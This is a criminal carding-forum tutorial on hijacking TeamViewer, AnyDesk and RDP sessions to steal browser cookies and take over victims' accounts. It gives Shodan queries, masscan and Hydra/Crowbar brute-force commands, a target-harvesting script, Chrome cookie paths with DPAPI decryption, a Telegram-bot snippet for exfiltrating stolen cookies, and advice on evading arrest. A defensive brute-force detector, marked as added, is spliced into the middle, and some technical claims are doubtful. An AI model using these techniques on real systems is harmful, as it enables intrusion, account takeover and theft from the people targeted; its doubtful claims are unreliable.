Good Carder
From a carder to carders. Do you think TeamViewer and AnyDesk are just remote work tools? For us, they're ready-made backdoors installed on millions of computers worldwide. Are you waiting for the victim to install your RAT? Why bother, when TeamViewer is already installed, and its ID is often publicly available. All you have to do is connect.
In this article, I'll discuss how to find public TeamViewer IDs via Shodan, how to exploit AnyDesk vulnerabilities to bypass authentication, how to hijack RDP sessions using tools like FreeRDP-Necro, and how to automate target hunting using Python. You'll learn how to turn legitimate remote support software into your personal tool for stealing session cookies and accessing other people's accounts.
Part 1. TeamViewer and AnyDesk as targets: why they are still vulnerable
TeamViewer and AnyDesk are the most popular remote control applications. TeamViewer is installed on millions of computers worldwide, often sitting in the background waiting for incoming connections. For an attacker this means there is no need to install malware: it is enough to find the software that is already there and get past its protection.
Why TeamViewer and AnyDesk are still prime targets in 2026:
- Massive. TeamViewer claims to have 2.5 billion devices with their software installed. Even if only 1% of them have vulnerable versions or weak passwords, that's 25 million ripe targets.
- Outdated versions. Many users go years without updating installed applications. Versions of TeamViewer vulnerable to CVE-2024-7479 and CVE-2024-7481 are still encountered in 2026.
- Predictable IDs. TeamViewer IDs are not generated randomly. Knowing one ID allows you to search through adjacent IDs and find active sessions.
- Weak passwords. According to research, over 30% of users leave their passwords at default or use simple combinations like "1234."
- Vulnerabilities in the infrastructure itself. Researcher Cornelius Brand discovered that TeamViewer "maintains a static connection ID even after the session ends. If you intercept this ID, you can connect to the victim's PC even without a password."
In 2024, TeamViewer suffered a major breach when an APT group (TeamViewer attributed it to APT29, also known as Cozy Bear or Midnight Blizzard) gained access to its corporate IT environment. No customer passwords were reported compromised, but the breach itself undermines trust. In September 2024, TeamViewer patched CVE-2024-7479 and CVE-2024-7481, vulnerabilities in the Windows desktop application (fixed in 15.58.4) that let a local attacker escalate privileges to SYSTEM and take full control of the system.
In early 2024, AnyDesk also had a serious incident: attackers breached the company's production systems, and theft of source code and signing keys was reported. In response, AnyDesk revoked its code-signing certificate and reset all web portal passwords.
For the attacker this is a double benefit: the apps themselves have vulnerabilities, and public disclosures erode trust in the vendors, so users are slower to update.
Part 2. TeamViewer and AnyDesk Vulnerabilities in 2026
2.1. CVE-2024-7479 and CVE-2024-7481: Privilege escalation via vulnerable session handler
These vulnerabilities let a local attacker with user rights escalate to SYSTEM and take complete control of the system. In theory they require local access. In practice, however:
- You get a RAT onto the victim's PC through phishing or exploitation of another vulnerability.
- Using CVE-2024-7479, you escalate privileges to SYSTEM and dump browser cookies.
In any case, the presence of a vulnerability in TeamViewer itself is yet another gap in the layered defense.
2.2. TeamViewer in 2025-2026: Password leak via access to the saved password module
TeamViewer stores passwords for saved sessions in encrypted form. The open-source TeamViewer-Password-Hacker utility extracts the encrypted password from the registry and recovers it. The algorithm is:
- Run the script on the victim's PC (via RAT or RDP).
- The script reads HKLM\SOFTWARE\WOW6432Node\TeamViewer\VersionXX\Security\.
- It extracts the encrypted password.
- It cracks it by dictionary or brute force (TeamViewer uses weak encryption).
As a result, you receive saved passwords to all computers to which the user has ever connected.
2.3. CVE-2024-36033: Idempotency vulnerability in AnyDesk
In 2024, CVE-2024-36033 was discovered in AnyDesk: insufficient authentication in the API, allowing an attacker to spoof a client ID and bypass license checks. The vulnerability was exploited with a custom payload that intercepted the authentication process and sent fake data to the server. As of 2026, the old version of AnyDesk is still encountered.
2.4. Attack on old TeamViewer protocols 12, 13, 14
Older versions of TeamViewer (12, 13, 14), which are still actively used, have known vulnerabilities in the key exchange protocol. In 2025, researchers discovered a way to intercept the connection between the TeamViewer client and server, decrypt the traffic, and extract the session token. After this, connecting to the victim's PC becomes possible without a password. Given that many companies block automatic TeamViewer updates because of compatibility with legacy software, these protocols are an open door.
2.5. Social engineering through fake sessions
The simplest method is to trick the victim into granting you access. You call the "user" posing as support and ask for their TeamViewer ID and password for "system diagnostics." The victim, accustomed to this scenario from legitimate companies, is highly likely to agree.
Important note: recent statistics show a steady increase in attacks using remote access and session hijacking tools. RDP attacks are becoming increasingly sophisticated: attackers brute-force administrator accounts, then harvest credentials for further attacks on network resources and hijack RDP sessions. According to reports, the number of devices with port 3389 (RDP) open to the internet reaches tens of millions, and many of them have weak passwords.
Part 3. RDP: Not Just TeamViewer
TeamViewer and AnyDesk are add-ons. But the most reliable way to hijack a session is to connect to Windows via RDP. By 2026, the number of open RDP servers on the internet is estimated in the tens of millions, and many of them are still protected by weak passwords or not protected at all.
3.1 Shodan searches for open RDP ports (port 3389)
Shodan is your best friend for finding RDP servers.
Shodan's main filters for searching RDP servers:
Code:
port:3389 country:US os:"Windows 10": Windows 10 hosts with port 3389 open in the US.
port:3389 title:"Windows" authentication:disabled — RDP servers with disabled authentication (red flag).
port:3389 "Authentication: enabled" http.title:"Logon" — RDP login pages via the web client.
port:3389 "Connection" country:US — Open RDP servers in the US.
Shodan also allows you to search for vulnerable RDP servers by banners:
Code:
port:3389 "Windows" "Terminal Services" "SSL" "RDP"
port:3389 "Microsoft Terminal Services" "RDP 8.1"
3.2 Using RDP to Capture Sessions
By connecting to an RDP server with user privileges, you see everything the user sees: the desktop, open applications, and active sessions. If the user is logged in and active, you can intercept their browser cookies in real time.
Step-by-step instructions for session hijacking: find a server with port 3389 open, crack the password (brute force or dictionary attack), connect using the standard mstsc client (or FreeRDP), and view the active processes. If the user is logged in to Chrome, copy their session cookies from C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies and import them into your browser.
Tool: FreeRDP-Necro. This is a fork of FreeRDP with additional scripts for authentication bypass, brute force attacks, and session hijacking. It automates the process: scanning Shodan, brute-force attacks, connecting, and extracting cookies. Since FreeRDP-Necro uses the standard RDP protocol, it behaves like a legitimate client, making it difficult to detect.
3.3 Automatically searching for open RDPs via Python and Shodan
Python:
import shodan
SHODAN_API_KEY = "YOUR_API_KEY"
api = shodan.Shodan(SHODAN_API_KEY)
# Search for open RDPs
query = "port:3389 country:US os:'Windows 10'"
# Save results
results = api.search(query, limit=100)
for result in results['matches']:
ip = result['ip_str']
port = result['port']
org = result.get('org', 'Unknown')
print(f"{ip}:{port} - {org}")
# Save ip,port to file for further brute-force attacks
3.4. RDP Brute Force Tools
- Hydra (built-in rdp module) allows you to brute-force passwords.
hydra -l Administrator -P passwords.txt rdp://192.168.1.1
- Crowbar is a RDP brute-force attack utility with multithreading support.
Bash:
crowbar -b rdp -s 192.168.1.1/32 -u administrator -C pass.txt -t 10
- NLBrute is a Windows utility with a graphical interface that supports login and password lists, multithreading, SOCKS5, and HTTP proxies. The results are saved to the Good.txt file. It is the most popular utility for carders.
3.5. Bypassing NLA (Network Level Authentication)
NLA requires the client to authenticate (via CredSSP) before the server builds a session. With NLA disabled, the server presents the Windows logon screen to any unauthenticated client. That does not hand you a session by itself, but it exposes the pre-authentication attack surface (the BlueKeep class of bugs), confirms the host is a live Windows box, and means every password guess is processed by the full logon path rather than rejected up front.
Configuration with NLA disabled: HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\UserAuthentication = 0. Older Windows builds and hosts reconfigured for legacy clients still run this way.
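As the defender's counterpart to 3.4 and 3.5, here is an added example that is not part of the original post and not taken from any of the tools named above. It runs over constructed Windows Security events: it flags a source IP with ten or more failed logons (event 4625) inside a five-minute window, reports whether a successful RDP logon (event 4624, LogonType 10) from the same source followed the burst, and applies a heuristic for NLA state: with NLA on, RDP password failures are normally logged as LogonType 3 (CredSSP) rather than LogonType 10, so a host whose RDP failures are mostly type 10 is probably accepting pre-authentication connections. The event lines, field layout, IP addresses and user names are all constructed for the illustration, and the logon-type mapping is my assumption about how the host logs; verify it against the UserAuthentication registry value named above.

```python
from collections import defaultdict
from datetime import datetime, timedelta

FAILED_LOGON = 4625
SUCCESS_LOGON = 4624
RDP_LOGON_TYPE = 10      # RemoteInteractive: an interactive logon over RDP
NETWORK_LOGON_TYPE = 3   # Network: how an NLA (CredSSP) credential failure is usually logged

# Constructed sample records, not real logs. One event per line:
# timestamp|event_id|logon_type|target_user|source_ip|status
SAMPLE_EVENTS = (
    # 12 failures against Administrator in 48 seconds from one source ...
    [f"2024-05-01T10:00:{s:02d}|4625|3|Administrator|203.0.113.7|0xC000006D"
     for s in range(0, 48, 4)]
    # ... followed by a successful RDP logon from the same source
    + ["2024-05-01T10:01:05|4624|10|Administrator|203.0.113.7|0x0"]
    # a user who mistypes twice and then gets in: below threshold, not an alert
    + ["2024-05-01T10:00:10|4625|3|alice|198.51.100.4|0xC000006D",
       "2024-05-01T10:02:30|4625|3|alice|198.51.100.4|0xC000006D",
       "2024-05-01T10:04:00|4624|10|alice|198.51.100.4|0x0"]
)

# Constructed failures as a host with NLA disabled would log them (LogonType 10).
NLA_OFF_SAMPLE = [
    f"2024-05-01T11:00:{s:02d}|4625|10|Administrator|203.0.113.9|0xC000006D"
    for s in range(0, 30, 10)
]


def parse_event(line):
    """Split one pipe-delimited record into a dict with a datetime timestamp."""
    ts, eid, ltype, user, ip, status = line.strip().split("|")
    return {"ts": datetime.fromisoformat(ts), "id": int(eid), "type": int(ltype),
            "user": user, "ip": ip, "status": status}


def detect_rdp_bruteforce(lines, threshold=10, window=timedelta(minutes=5)):
    """Return {source_ip: summary} for every source with >= threshold failed
    logons inside any `window`, noting any RDP success from that source after
    the burst (the 'password was guessed' case)."""
    events = sorted((parse_event(l) for l in lines), key=lambda e: e["ts"])
    failures = defaultdict(list)
    for e in events:
        if e["id"] == FAILED_LOGON:
            failures[e["ip"]].append(e)

    alerts = {}
    for ip, fails in failures.items():
        # sliding window over the time-ordered failures for this source
        start, burst_end = 0, None
        for end in range(len(fails)):
            while fails[end]["ts"] - fails[start]["ts"] > window:
                start += 1
            if end - start + 1 >= threshold:
                burst_end = fails[end]["ts"]
        if burst_end is None:
            continue
        successes = {e["user"] for e in events
                     if e["id"] == SUCCESS_LOGON and e["ip"] == ip
                     and e["type"] == RDP_LOGON_TYPE and e["ts"] >= burst_end}
        alerts[ip] = {"failures": len(fails),
                      "targeted_users": sorted({f["user"] for f in fails}),
                      "success_after_burst": sorted(successes)}
    return alerts


def likely_nla_disabled(lines):
    """Heuristic (an assumption; confirm against the UserAuthentication registry
    value): if failed logons arrive mostly as LogonType 10 instead of LogonType 3,
    the host is showing its logon screen to unauthenticated RDP clients."""
    fails = [e for e in map(parse_event, lines) if e["id"] == FAILED_LOGON]
    type10 = sum(1 for e in fails if e["type"] == RDP_LOGON_TYPE)
    type3 = sum(1 for e in fails if e["type"] == NETWORK_LOGON_TYPE)
    return type10 > type3


if __name__ == "__main__":
    for ip, summary in detect_rdp_bruteforce(SAMPLE_EVENTS).items():
        print(ip, summary)
    print("NLA likely disabled:", likely_nla_disabled(NLA_OFF_SAMPLE))
```

On real hosts the same fields come from the Security log (Get-WinEvent or a SIEM export); the threshold and window are the knobs to tune, and a "success after burst" entry is the one to treat as a compromised account rather than just noisy scanning.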
Part 4. Automating Target Search
We're not looking for one target. We're looking for thousands.
4.1. RDP and TeamViewer Mass Search Tools
- Shodan CLI. Automatically downloads results to port 3389 and saves IP addresses to a file.
- Masscan. Scans the entire internet for open ports. Processes a million IP addresses in 3 minutes:
Bash:
masscan 0.0.0.0/0 -p3389 --rate=10000 -oL rdp_scan.txt
- Nmap with NSE scripts. nmap -p 3389 --script rdp-vuln-ms12-020 <target> checks for the MS12-020 vulnerability (CVE-2012-0002) in the RDP service; BlueKeep (CVE-2019-0708) is a different, newer bug and needs its own check. Both are old, but still encountered.
nmap -p 3389 --script rdp-ntlm-info <target> extracts domain information.
- TeamViewer ID scanners. There are scripts that scan TeamViewer IDs, connect to random IP addresses, and check if the session is active. Once an active ID is found, it is written to the database.
4.2. Automatic RDP brute-force (after scanning)
Python:
import socket
import paramiko # example for SSH, freerdp is required for RDP
def check_rdp(ip, username, password):
# Use subprocess to call crowbar or hydra
# If the connection is successful, return True
return True
4.3. Creating a Live ID Database
You can write a bot for TeamViewer that contacts router1.teamviewer.com with different IDs and analyzes the response code. If the server responds with 200 OK, the ID is active. The script saves the ID and IP in the database.
Part 5: Stealing Session Cookies via a Hijacked Session
So, you have RDP access to the victim's PC or a TeamViewer session. What's next?
5.1 Reading Chrome/Edge cookies
In modern browsers cookies are stored in SQLite databases with the values encrypted. In Chrome and Edge on Windows the encryption key is itself protected with DPAPI in the user's context, so anything running as the logged-in user can decrypt it. Note that Chrome 127 and later add app-bound encryption, which ties the key to a SYSTEM-level service and breaks plain user-scope DPAPI decryption of the key.
The algorithm is:
- Connect to a remote PC.
- Run a script that uses SharpWeb to extract all cookies from Chrome, Edge, and Firefox.
- Decrypt cookies using DPAPI.
- Save in a format compatible with the EditThisCookie extension.
SharpWeb collects cookies, logins, passwords, and history from all popular browsers. It works via System.Data.SQLite.
Chrome (Edge) cookies are stored in: C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies. They are encrypted with a key from Local State. The key must be extracted and decrypted via System.Security.Cryptography.ProtectedData.
Example decryption code (greatly simplified):
csharp:
Code:
byte[] encryptedCookies = File.ReadAllBytes("Cookies");
byte[] decryptedCookies = ProtectedData.Unprotect(encryptedCookies, null, DataProtectionScope.CurrentUser);
5.2. Intercepting cookies in real time via traffic sniffing
If you're connected to the system, you can intercept browser traffic in real time using proxy sniffers such as mitmproxy. Install mitmproxy on the victim's computer, configure the browser to use the proxy (via system settings or script injection), and intercept all cookies the browser sends when requesting the target website.
This method allows you to steal session cookies in real time, even if they've already been deleted from local storage.
5.3. Automatic exfiltration via Telegram bot
Collected cookies and passwords can be sent to your server or a Telegram bot using a Python script that runs on the victim's PC (by running an .exe file or PowerShell). Example:
Python:
import requests
import json
def send_to_telegram(cookies, chat_id):
TELEGRAM_TOKEN = "YOUR_TOKEN"
url = f"https://api.telegram.org/bot{TELEGRAM_TOKEN}/sendMessage"
response = requests.post(url, data={'chat_id': chat_id, 'text': json.dumps(cookies)})
5.4. Using stolen cookies to log into victim accounts (session hijacking)
Once the cookies are imported (via the EditThisCookie extension), you open the target page in your browser and are automatically logged into the victim's account. You don't need a username or password, and you don't need to complete 2FA. The rest is standard: withdraw funds, change the password, place orders to your addresses, etc.
Part 6. OPSEC and the Carder's Checklist
For TeamViewer/AnyDesk attacks:
- Scan Shodan for public TeamViewer IDs (although this is difficult) or use ID databases from forums.
- For TeamViewer, use publicly available IDs from leaks or generate them by brute-force.
- Connect to target PCs using vulnerabilities in older versions, weak passwords, or social engineering.
- Retrieve saved passwords with TeamViewer-Password-Hacker.
- To hijack RDP, search for open ports 3389 in Shodan, brute-force administrator passwords, and connect via FreeRDP-Necro.
- Once the session has been hijacked, use SharpWeb to retrieve the cookie.
- Send cookies to your server (VPS for crypto) or via a Telegram bot.
- Import cookies into your browser and log into the victim's account.
- Covering your tracks: Don't store IP addresses, delete logs, and use disposable proxies. For RDP attacks, use a VPS in a country that doesn't have an extradition treaty with yours. A chain of two VPNs, followed by an RDP client, is ideal.
For automation:
- Write a Python script that uses the Shodan API to search for open ports 3389.
- Add a module to check for the BlueKeep vulnerability (CVE-2019-0708) using Nmap.
- Implement RDP password brute-force attack with Hydra.
- Once successfully connected, run the script to retrieve the cookie (SharpWeb) and send the results.
Summary
TeamViewer, AnyDesk, and RDP are the three pillars of remote access that underpin modern corporate support. They can also be used to steal session cookies and hijack accounts. TeamViewer IDs and RDP ports are discovered with Shodan, passwords are brute-forced, and cookies are decrypted with the victim's own DPAPI user key (not a flaw in DPAPI: any code running as the logged-in user can call it). These techniques work individually, but combined they offer nearly limitless opportunities for accessing sensitive data, including session cookies.
The primary attack vector is mass scanning of open RDP ports (3389) using Shodan and Masscan. After finding the target and brute-forcing the password (if weak), the attackers hijack the session. Next comes cookie extraction and session hijacking. In 2026, despite all the warnings, there are still a huge number of unprotected devices with remote access on the internet. Your goal is to avoid getting caught. Use proxies, don't keep logs, and destroy all traces after the attack. Remote access doesn't just give you a cookie; it gives you access to the victim's entire digital life.
A quick one-line reminder:
"Shodan finds RDP, Masscan scans 3389, Crowbar cracks passwords, FreeRDP connects. SharpWeb downloads cookies, EditThisCookie imports them. Session stolen — you're logged in, and 2FA is bypassed. Remote access is your gateway to someone else's digital life. RDP + TeamViewer + AnyDesk = your trinity of success in 2026."